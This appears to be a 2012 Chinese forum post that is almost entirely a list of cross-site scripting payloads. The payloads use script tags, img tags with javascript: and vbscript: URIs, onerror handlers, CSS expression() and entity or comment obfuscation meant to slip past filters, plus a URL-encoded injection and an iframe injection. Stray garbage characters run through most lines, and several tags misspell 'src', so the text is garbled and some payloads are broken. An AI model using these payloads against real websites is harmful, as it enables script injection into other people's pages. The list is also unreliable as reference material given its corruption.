<script>alert("跨站")</script> (最常用)
) `, ^. ^, m3 J<img scr=javascript:alert("跨站")></img>
( V0 n5 k# B0 O<img scr="javascript: alert(/跨站/)></img>
1 o8 m0 R, q2 H6 B- f<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格). V: R8 \+ U6 z7 x# j
<img scr="#" onerror=alert(/跨站/)></img>
' K+ d' H# j. G; c<img scr="#" style="xss:expression(alert(/xss/));"></img>) x' f0 d8 Z' M! z! ~
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)7 d3 L/ f1 ]& O9 M8 U) b* U
<img src=vbscript:msgbox ("xss")></img>
/ y9 N& j1 ]9 w+ r1 J- H<style> input {left:expression (alert('xss'))}</style>
2 a& s% k1 ^+ I7 n9 l" D<div style={left:expression (alert('xss'))}></div>+ |. r; A6 l; a2 @ L
<div style={left:exp/* */ression (alert('xss'))}></div>0 O4 k& s" x) G
<div style={left:\0065\0078ression (alert('xss'))}></div>0 o/ l4 V7 G5 b/ _, H
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
) S1 K% g3 w0 \* P$ Yunicode <div style="{left:expRessioN (alert('xss'))}">
0 c% P+ |% i K) _) f) v
8 Z0 W0 _$ X |- |, H' q"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
$ D2 _3 d; F/ Z, ?9 D4 n; W |
发表于 2012-9-15 14:09:13
收藏
支持
反对